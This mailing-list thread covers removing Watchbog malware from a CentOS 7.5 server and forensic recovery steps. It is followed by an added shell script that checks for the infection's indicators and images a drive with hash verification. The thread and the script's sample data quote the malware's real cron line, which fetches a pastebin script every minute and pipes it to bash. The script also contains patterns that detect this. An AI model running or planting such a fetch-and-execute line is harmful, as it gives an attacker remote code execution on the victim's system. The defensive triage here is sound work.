Valeri Galtsev wrote:
> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
>>> Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps, and this is done manually.
>>>
>>> 1) rm -fr /tmp/*timesyncc.service*
>>> 2) crontab -e -u apigee and delete the cron entry:
>>>    */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>> 3) ps aux | grep watchbog
>>>    kill -9 pidof watchbog
>>>
>>> Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got infected with the Watchbog malware? Is there any open source software which can be installed on a CentOS 7.5 Linux box to detect and prevent malware?
>>
>> Do you have untampered log files?
>
> Standard compromise recovery procedure since forever is (your local policy may have a slightly different order about notifications and similar):
>
> - back up all user data

You should have been doing that all along.

First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.

Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups.

<snip>

Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).

mark
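The thread describes three indicators of this infection (the *timesyncc.service* files in /tmp, a per-minute cron entry for the apigee user that fetches a pastebin script and pipes it to bash, and a running watchbog process) and, further down, the dd-the-whole-drive evidence step. The script below is an added example written for this thread; it is not code from the list, from the blog post cited, or from any project. The sample crontab, ps and /tmp listings are constructed, the function names are my own, and the only page-specific value reused is the pastebin path quoted in the thread. Each check reads its input on stdin, so it can be pointed at live output or at copies captured from the forensic image, which keeps the evidence itself untouched while you look.

```shell
#!/bin/sh
# Added example, not code from the thread or the blog post it cites.
# Triage helpers for the Watchbog indicators named in the thread:
#   - /tmp entries matching *timesyncc.service*
#   - a cron line that downloads with curl/wget and pipes into a shell
#   - a running "watchbog" process
# plus a dd-and-hash step for preserving the drive image.

# Constructed sample data; the pastebin path is the one quoted in the thread.
SAMPLE_CRONTAB='# m h  dom mon dow   command
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1'
SAMPLE_PS='USER       PID %CPU COMMAND
root         1  0.0 /usr/lib/systemd/systemd
apigee    2345 97.3 ./watchbog
postfix    456  0.0 qmgr -l -t unix -u'
SAMPLE_TMP='systemd-private-4f2a
.timesyncc.service
timesyncc.service.lock
hsperfdata_apigee'

# Count cron lines that download with curl/wget and pipe the result into a shell.
# Catches the "(curl ...||wget ...)|bash" shape whatever the URL is.
suspicious_cron_lines() {
    grep -Ec '(curl|wget).*[|][[:space:]]*(ba)?sh([[:space:]]|$)' || true
}

# Count cron lines that pull from pastebin's raw endpoint, the dropper host in the thread.
pastebin_cron_lines() {
    grep -c 'pastebin\.com/raw/' || true
}

# Print the PID of every process whose line mentions watchbog.
# Works on "ps aux" output because the PID is the second column there.
watchbog_pids() {
    grep -i 'watchbog' | awk '{ print $2 }'
}

# Count /tmp entries matching the *timesyncc.service* name the thread removes.
timesyncc_artifacts() {
    grep -c 'timesyncc\.service' || true
}

# SHA-256 of a file, using whichever tool the host provides.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# Evidence preservation as described in the thread: copy a device or file
# with dd, record the copy's hash in a sidecar file, and confirm the copy
# hashes identically to the source. Returns 0 when the hashes match.
# Deliberately no conv=sync: that pads the last block and breaks the comparison.
image_and_verify() {
    dd if="$1" of="$2" bs=4M 2>/dev/null || return 1
    sha256_of "$2" > "$2.sha256"
    [ "$(sha256_of "$1")" = "$(sha256_of "$2")" ]
}

# Run against the live host only when asked (needs root for another user's
# crontab); the default run exercises the constructed samples.
if [ "${1:-}" = "--live" ]; then
    echo "suspicious cron lines (apigee): $(crontab -l -u apigee 2>/dev/null | suspicious_cron_lines)"
    echo "pastebin cron lines (apigee):   $(crontab -l -u apigee 2>/dev/null | pastebin_cron_lines)"
    echo "watchbog pids:                  $(ps aux | watchbog_pids | tr '\n' ' ')"
    echo "timesyncc artifacts in /tmp:    $(ls -A /tmp | timesyncc_artifacts)"
else
    echo "sample suspicious cron lines: $(printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines)"
    echo "sample pastebin cron lines:   $(printf '%s\n' "$SAMPLE_CRONTAB" | pastebin_cron_lines)"
    echo "sample watchbog pids:         $(printf '%s\n' "$SAMPLE_PS" | watchbog_pids | tr '\n' ' ')"
    echo "sample timesyncc artifacts:   $(printf '%s\n' "$SAMPLE_TMP" | timesyncc_artifacts)"
fi
```

Run it with no arguments to see the checks fire on the samples, or with `--live` on the box (or on a mounted copy of its filesystem) to scan real data. Note the checks only confirm the indicators the thread already names; they say nothing about the initial entry vector, which is what the untampered logs and the preserved drive image are for.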